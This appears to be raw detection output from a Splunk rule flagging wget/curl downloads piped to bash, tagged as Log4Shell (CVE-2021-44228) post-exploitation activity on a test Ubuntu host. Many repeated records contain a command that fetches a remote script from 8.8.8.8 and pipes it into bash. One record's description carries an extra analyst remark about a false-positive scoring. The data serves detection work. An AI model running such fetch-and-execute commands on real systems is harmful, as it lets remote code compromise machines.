annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or macOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. Note that the process field of this event is a plain `wget <url>` of a .jar launched from a bash parent with no pipe to bash, yet it still scored 80 with a risk_message claiming execution; the rule evidently matches simple downloads too, so review the full command line and parent process before treating a hit as remote-script execution.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
